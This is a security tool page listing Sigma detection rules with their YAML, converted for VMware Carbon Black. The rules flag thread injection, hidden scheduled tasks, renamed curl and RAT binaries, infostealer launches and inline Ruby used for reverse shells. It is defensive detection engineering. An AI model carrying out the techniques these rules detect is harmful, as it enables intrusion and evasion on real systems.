Tool
EDR / XDR
VMware Carbon Black
1,440 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,646 rules (.zip, 1.2 MB)
Every VMware Carbon Black query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance12
Resource Development10
Initial Access10
Execution30
Persistence42
Privilege Escalation20
Stealth79
Defense Impairment32
Credential Access35
Discovery33
Lateral Movement16
Collection20
Command and Control24
Exfiltration10
Impact18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 1,440
medium
Moderate
Medium FP
Remote Thread Created In Shell Application
Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE".
It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
view Sigma YAML
title: Remote Thread Created In Shell Application
id: a9d4d3fa-8fc0-41bc-80b1-30b9fda79d6f
status: test
description: |
Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE".
It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
references:
- https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/
- https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/
author: Splunk Research Team
date: 2024-07-29
modified: 2025-07-04
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- detection.threat-hunting
logsource:
product: windows
category: create_remote_thread
detection:
selection:
TargetImage|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
filter_main_system:
SourceImage|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Program Files (x86)\'
- 'C:\Program Files\'
filter_optional_defender:
SourceImage|endswith: '\MsMpEng.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Remote Thread Creation In Uncommon Target Image
Detects uncommon target processes for remote thread creation
view Sigma YAML
title: Remote Thread Creation In Uncommon Target Image
id: a1a144b7-5c9b-4853-a559-2172be8d4a03
related:
- id: f016c716-754a-467f-a39e-63c06f773987
type: obsolete
status: test
description: Detects uncommon target processes for remote thread creation
references:
- https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
author: Florian Roth (Nextron Systems)
date: 2022-03-16
modified: 2025-07-04
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055.003
logsource:
product: windows
category: create_remote_thread
detection:
selection:
TargetImage|endswith:
- '\calc.exe'
- '\calculator.exe'
- '\mspaint.exe'
- '\notepad.exe'
- '\ping.exe'
- '\sethc.exe'
- '\spoolsv.exe'
- '\wordpad.exe'
- '\write.exe'
filter_main_csrss:
SourceImage: 'C:\Windows\System32\csrss.exe'
filter_main_notepad:
SourceImage:
- 'C:\Windows\System32\explorer.exe'
- 'C:\Windows\System32\OpenWith.exe'
TargetImage: 'C:\Windows\System32\notepad.exe'
filter_main_sethc:
SourceImage: 'C:\Windows\System32\AtBroker.exe'
TargetImage: 'C:\Windows\System32\Sethc.exe'
filter_optional_aurora_1:
StartFunction: 'EtwpNotificationThread'
filter_optional_aurora_2:
SourceImage|contains: 'unknown process'
filter_optional_vmtoolsd:
SourceImage: 'C:\Program Files\VMware\VMware Tools\vmtoolsd.exe'
StartFunction: 'GetCommandLineW'
TargetImage:
- 'C:\Windows\System32\notepad.exe'
- 'C:\Windows\System32\spoolsv.exe'
filter_optional_xerox_pjems:
SourceImage: 'C:\Program Files\Xerox\XeroxPrintExperience\CommonFiles\XeroxPrintJobEventManagerService.exe'
StartFunction: 'LoadLibraryW'
TargetImage: 'C:\Windows\System32\spoolsv.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Remote Thread Creation Via PowerShell
Detects the creation of a remote thread from a Powershell process to another process
view Sigma YAML
title: Remote Thread Creation Via PowerShell
id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50
related:
- id: 99b97608-3e21-4bfe-8217-2a127c396a0e
type: derived
status: test
description: Detects the creation of a remote thread from a Powershell process to another process
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: Nikita Nazarov, oscd.community
date: 2020-10-06
modified: 2023-11-10
tags:
- attack.execution
- attack.t1059.001
- detection.threat-hunting
logsource:
product: windows
category: create_remote_thread
detection:
selection:
SourceImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
filter_main_compattelrunner:
SourceParentImage|endswith: ':\Windows\System32\CompatTelRunner.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Remote Thread Creation Via PowerShell In Uncommon Target
Detects the creation of a remote thread from a Powershell process in an uncommon target process
view Sigma YAML
title: Remote Thread Creation Via PowerShell In Uncommon Target
id: 99b97608-3e21-4bfe-8217-2a127c396a0e
related:
- id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50
type: similar
status: test
description: Detects the creation of a remote thread from a Powershell process in an uncommon target process
references:
- https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
author: Florian Roth (Nextron Systems)
date: 2018-06-25
modified: 2023-11-10
tags:
- attack.execution
- attack.stealth
- attack.t1218.011
- attack.t1059.001
logsource:
product: windows
category: create_remote_thread
detection:
selection:
SourceImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
TargetImage|endswith:
# Note: Please add additional potential interesting targets to increase coverage
- '\rundll32.exe'
- '\regsvr32.exe'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Remote Utilities Host Service Install
Detects Remote Utilities Host service installation on the target system.
view Sigma YAML
title: Remote Utilities Host Service Install
id: 85cce894-dd8b-4427-a958-5cc47a4dc9b9
status: test
description: Detects Remote Utilities Host service installation on the target system.
references:
- https://www.remoteutilities.com/support/kb/host-service-won-t-start/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-31
tags:
- attack.persistence
logsource:
product: windows
service: system
detection:
# Example:
# <EventData>
# <Data Name="ServiceName">Remote Utilities - Host</Data>
# <Data Name="ImagePath">"C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe" -service</Data>
# <Data Name="ServiceType">user mode service</Data>
# <Data Name="StartType">auto start</Data>
# <Data Name="AccountName">LocalSystem</Data>
# </EventData>
selection_root:
Provider_Name: 'Service Control Manager'
EventID: 7045
selection_service:
- ImagePath|contains|all:
- '\rutserv.exe'
- '-service'
- ServiceName: 'Remote Utilities - Host'
condition: all of selection_*
falsepositives:
- Legitimate use of the tool
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Removal Of Index Value to Hide Schedule Task - Registry
Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
view Sigma YAML
title: Removal Of Index Value to Hide Schedule Task - Registry
id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
related:
- id: acd74772-5f88-45c7-956b-6a7b36c294d2
type: similar
- id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
type: similar
status: test
description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
references:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-26
modified: 2025-10-25
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_delete
detection:
selection:
TargetObject|contains|all:
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\'
- 'Index'
condition: selection
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml
Convert to SIEM query
medium
Moderate
Medium FP
Removal Of SD Value to Hide Schedule Task - Registry
Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
view Sigma YAML
title: Removal Of SD Value to Hide Schedule Task - Registry
id: acd74772-5f88-45c7-956b-6a7b36c294d2
related:
- id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
type: similar
status: test
description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
references:
- https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
author: Sittikorn S
date: 2022-04-15
modified: 2025-10-25
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_delete
detection:
selection:
TargetObject|contains|all:
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\'
- 'SD'
condition: selection
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml
Convert to SIEM query
medium
Strong
Medium FP
Removal of Potential COM Hijacking Registry Keys
Detects any deletion of entries in ".*\shell\open\command" registry keys.
These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
view Sigma YAML
title: Removal of Potential COM Hijacking Registry Keys
id: 96f697b0-b499-4e5d-9908-a67bec11cdb6
status: test
description: |
Detects any deletion of entries in ".*\shell\open\command" registry keys.
These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/7
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md
- https://learn.microsoft.com/en-us/windows/win32/shell/launch
- https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand
- https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2025-10-07
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_delete
detection:
selection:
TargetObject|endswith: '\shell\open\command'
filter_main_explorer:
Image|endswith: 'C:\Windows\explorer.exe'
filter_main_svchost:
Image: 'C:\Windows\system32\svchost.exe'
filter_main_msiexec:
Image:
- 'C:\Windows\System32\msiexec.exe'
- 'C:\Windows\SysWOW64\msiexec.exe'
filter_main_generic_prorams:
Image|startswith:
- 'C:\Program Files\'
- 'C:\Program Files (x86)\'
filter_main_openwith:
Image: 'C:\Windows\System32\OpenWith.exe'
filter_optional_dropbox:
Image|endswith: '\Dropbox.exe'
# We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: '\Dropbox.'
filter_optional_wireshark:
Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe'
# We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: '\wireshark-capture-file\'
filter_optional_peazip:
Image|contains: 'peazip'
# We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: '\PeaZip.'
filter_optional_everything:
Image|endswith: '\Everything.exe'
# We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: '\Everything.'
filter_optional_uninstallers:
# This image path is linked with different uninstallers when running as admin unfortunately
Image|startswith: 'C:\Windows\Installer\MSI'
filter_optional_java:
Image|startswith: 'C:\Program Files (x86)\Java\'
Image|endswith: '\installer.exe'
TargetObject|contains: '\Classes\WOW6432Node\CLSID\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}'
filter_optional_edgeupdate:
Image|contains: '\Microsoft\EdgeUpdate\Install'
filter_optional_avira:
Image:
- 'C:\Program Files (x86)\Avira\Antivirus\'
- 'C:\Program Files\Avira\Antivirus\'
TargetObject|endswith:
- '\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command'
- '\AntiVir.Keyfile\shell\open\command'
filter_optional_installer_temp:
- Image|contains|all:
- 'AppData\Local\Temp'
- '\setup.exe'
- Image|contains|all:
- '\Temp\is-'
- '\target.tmp'
filter_optional_ninite:
Image|endswith: '\ninite.exe'
filter_optional_discord:
Image|endswith: '\reg.exe'
TargetObject|endswith: '\Discord\shell\open\command'
filter_optional_spotify:
Image|endswith: '\Spotify.exe'
TargetObject|endswith: '\Spotify\shell\open\command'
filter_optional_eclipse:
Image|endswith: 'C:\eclipse\eclipse.exe'
TargetObject|contains: '_Classes\eclipse+'
filter_optional_teamviewer:
Image|contains|all:
- '\Temp'
- '\TeamViewer'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered
level: medium
Convert to SIEM query
medium
Moderate
High FP
Remove Account From Domain Admin Group
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.
Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
view Sigma YAML
title: Remove Account From Domain Admin Group
id: 48a45d45-8112-416b-8a67-46e03a4b2107
status: test
description: |
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.
Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group
author: frack113
date: 2021-12-26
tags:
- attack.impact
- attack.t1531
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Remove-ADGroupMember'
- '-Identity '
- '-Members '
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Remove Immutable File Attribute
Detects usage of the 'chattr' utility to remove immutable file attribute.
view Sigma YAML
title: Remove Immutable File Attribute
id: 34979410-e4b5-4e5d-8cfb-389fdff05c12
related:
- id: a5b977d6-8a81-4475-91b9-49dbfcd941f7
type: derived
status: test
description: Detects usage of the 'chattr' utility to remove immutable file attribute.
references:
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.defense-impairment
- attack.t1222.002
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/chattr'
CommandLine|contains: ' -i '
condition: selection
falsepositives:
- Administrator interacting with immutable files (e.g. for instance backups).
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Remove Immutable File Attribute - Auditd
Detects removing immutable file attribute.
view Sigma YAML
title: Remove Immutable File Attribute - Auditd
id: a5b977d6-8a81-4475-91b9-49dbfcd941f7
status: test
description: Detects removing immutable file attribute.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
author: Jakob Weinzettl, oscd.community
date: 2019-09-23
modified: 2022-11-26
tags:
- attack.defense-impairment
- attack.t1222.002
logsource:
product: linux
service: auditd
detection:
selection:
type: 'EXECVE'
a0|contains: 'chattr'
a1|contains: '-i'
condition: selection
falsepositives:
- Administrator interacting with immutable files (e.g. for instance backups).
level: medium
simulation:
- type: atomic-red-team
name: Remove immutable file attribute
technique: T1222.002
atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
Convert to SIEM query
medium
Moderate
Medium FP
Remove Scheduled Cron Task/Job
Detects usage of the 'crontab' utility to remove the current crontab.
This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
view Sigma YAML
title: Remove Scheduled Cron Task/Job
id: c2e234de-03a3-41e1-b39a-1e56dc17ba67
status: test
description: |
Detects usage of the 'crontab' utility to remove the current crontab.
This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
references:
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.stealth
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'crontab'
CommandLine|contains: ' -r'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Renamed AutoHotkey.EXE Execution
Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
view Sigma YAML
title: Renamed AutoHotkey.EXE Execution
id: 0f16d9cf-0616-45c8-8fad-becc11b5a41c
status: test
description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
references:
- https://www.autohotkey.com/download/
- https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
author: Nasreddine Bencherchali
date: 2023-02-07
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
- Product|contains: 'AutoHotkey'
- Description|contains: 'AutoHotkey'
- OriginalFileName:
- 'AutoHotkey.exe'
- 'AutoHotkey.rc'
filter:
- Image|endswith:
- '\AutoHotkey.exe'
- '\AutoHotkey32.exe'
- '\AutoHotkey32_UIA.exe'
- '\AutoHotkey64.exe'
- '\AutoHotkey64_UIA.exe'
- '\AutoHotkeyA32.exe'
- '\AutoHotkeyA32_UIA.exe'
- '\AutoHotkeyU32.exe'
- '\AutoHotkeyU32_UIA.exe'
- '\AutoHotkeyU64.exe'
- '\AutoHotkeyU64_UIA.exe'
- Image|contains: '\AutoHotkey'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Renamed BOINC Client Execution
Detects the execution of a renamed BOINC binary.
view Sigma YAML
title: Renamed BOINC Client Execution
id: 30d07da2-83ab-45d8-ae75-ec7c0edcaffc
status: test
description: Detects the execution of a renamed BOINC binary.
references:
- https://boinc.berkeley.edu/
- https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
author: Matt Anderson (Huntress)
date: 2024-07-23
tags:
- attack.defense-impairment
- attack.t1553
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName: 'BOINC.exe'
filter_main_legit_name:
Image|endswith: '\BOINC.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Renamed CURL.EXE Execution
Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
view Sigma YAML
title: Renamed CURL.EXE Execution
id: 7530cd3d-7671-43e3-b209-976966f6ea48
status: test
description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
references:
- https://twitter.com/Kostastsale/status/1700965142828290260
author: X__Junior (Nextron Systems)
date: 2023-09-11
modified: 2023-10-12
tags:
- attack.execution
- attack.stealth
- attack.t1059
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
- OriginalFileName: 'curl.exe'
- Description: 'The curl executable'
filter_main_img:
Image|contains: '\curl'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml
Convert to SIEM query
medium
Moderate
Medium FP
Renamed FTP.EXE Execution
Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
view Sigma YAML
title: Renamed FTP.EXE Execution
id: 277a4393-446c-449a-b0ed-7fdc7795244c
status: test
description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
references:
- https://lolbas-project.github.io/lolbas/Binaries/Ftp/
author: Victor Sergeev, oscd.community
date: 2020-10-09
modified: 2023-02-03
tags:
- attack.execution
- attack.stealth
- attack.t1059
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection_original:
OriginalFileName: 'ftp.exe'
filter_img:
Image|endswith: '\ftp.exe'
condition: selection_original and not filter_img
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml
Convert to SIEM query
medium
Moderate
Medium FP
Renamed Microsoft Teams Execution
Detects the execution of a renamed Microsoft Teams binary.
view Sigma YAML
title: Renamed Microsoft Teams Execution
id: 88f46b67-14d4-4f45-ac2c-d66984f22191
status: test
description: Detects the execution of a renamed Microsoft Teams binary.
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-07-12
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName:
- 'msteams.exe'
- 'teams.exe'
filter_main_legit_names:
Image|endswith:
- '\msteams.exe'
- '\teams.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Renamed Remote Utilities RAT (RURAT) Execution
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
view Sigma YAML
title: Renamed Remote Utilities RAT (RURAT) Execution
id: 9ef27c24-4903-4192-881a-3adde7ff92a5
status: test
description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
references:
- https://redcanary.com/blog/misbehaving-rats/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-19
modified: 2023-02-03
tags:
- attack.collection
- attack.command-and-control
- attack.discovery
- attack.stealth
- attack.s0592
logsource:
category: process_creation
product: windows
detection:
selection:
Product: 'Remote Utilities'
filter:
Image|endswith:
- '\rutserv.exe'
- '\rfusclient.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Replace.exe Usage
Detects the use of Replace.exe which can be used to replace file with another file
view Sigma YAML
title: Replace.exe Usage
id: 9292293b-8496-4715-9db6-37028dcda4b3
status: test
description: Detects the use of Replace.exe which can be used to replace file with another file
references:
- https://lolbas-project.github.io/lolbas/Binaries/Replace/
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace
author: frack113
date: 2022-03-06
modified: 2024-03-13
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\replace.exe'
argument:
CommandLine|contains|windash: '-a'
condition: selection and argument
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Response File Execution Via Odbcconf.EXE
Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
view Sigma YAML
title: Response File Execution Via Odbcconf.EXE
id: 5f03babb-12db-4eec-8c82-7b4cb5580868
related:
- id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5
type: similar
- id: 65d2be45-8600-4042-b4c0-577a1ff8a60e
type: obsolete
status: test
description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
references:
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
- https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
modified: 2024-03-05
tags:
- attack.stealth
- attack.t1218.008
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\odbcconf.exe'
- OriginalFileName: 'odbcconf.exe'
selection_cli:
CommandLine|contains|windash: ' -f '
selection_rsp_ext:
CommandLine|contains: '.rsp'
condition: all of selection_*
falsepositives:
- The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Rhadamanthys Stealer Module Launch Via Rundll32.EXE
Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
view Sigma YAML
title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5
status: test
description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
references:
- https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88
- https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
- https://www.joesandbox.com/analysis/790122/0/html
- https://twitter.com/anfam17/status/1607477672057208835
author: TropChaud
date: 2023-01-26
modified: 2023-02-05
tags:
- attack.stealth
- attack.t1218.011
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_rundll32:
- OriginalFileName: 'RUNDLL32.EXE'
- Image|endswith: '\rundll32.exe'
selection_dll:
CommandLine|contains: 'nsis_uns'
selection_export_function:
CommandLine|contains: 'PrintUIEntry'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Root Account Enable Via Dsenableroot
Detects attempts to enable the root account via "dsenableroot"
view Sigma YAML
title: Root Account Enable Via Dsenableroot
id: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11
status: test
description: Detects attempts to enable the root account via "dsenableroot"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md
- https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml
- https://ss64.com/osx/dsenableroot.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1078
- attack.t1078.001
- attack.t1078.003
- attack.initial-access
- attack.persistence
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dsenableroot'
filter_main_disable:
CommandLine|contains: ' -d '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Root Certificate Installed - PowerShell
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
view Sigma YAML
title: Root Certificate Installed - PowerShell
id: 42821614-9264-4761-acfc-5772c3286f76
status: test
description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
author: 'oscd.community, @redcanary, Zach Stanford @svch0st'
date: 2020-10-10
modified: 2022-12-02
tags:
- attack.defense-impairment
- attack.t1553.004
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection1:
ScriptBlockText|contains|all:
- 'Move-Item'
- 'Cert:\LocalMachine\Root'
selection2:
ScriptBlockText|contains|all:
- 'Import-Certificate'
- 'Cert:\LocalMachine\Root'
condition: 1 of selection*
falsepositives:
- Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
level: medium
Convert to SIEM query
medium
Moderate
High FP
Ruby Inline Command Execution
Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
view Sigma YAML
title: Ruby Inline Command Execution
id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8
status: test
description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\ruby.exe'
- OriginalFileName: 'ruby.exe'
selection_cli:
CommandLine|contains: ' -e'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Ruby on Rails Framework Exceptions
Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
view Sigma YAML
title: Ruby on Rails Framework Exceptions
id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a
status: stable
description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
references:
- http://edgeguides.rubyonrails.org/security.html
- http://guides.rubyonrails.org/action_controller_overview.html
- https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
- https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
author: Thomas Patzke
date: 2017-08-06
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: ruby_on_rails
detection:
keywords:
- ActionController::InvalidAuthenticityToken
- ActionController::InvalidCrossOriginRequest
- ActionController::MethodNotAllowed
- ActionController::BadRequest
- ActionController::ParameterMissing
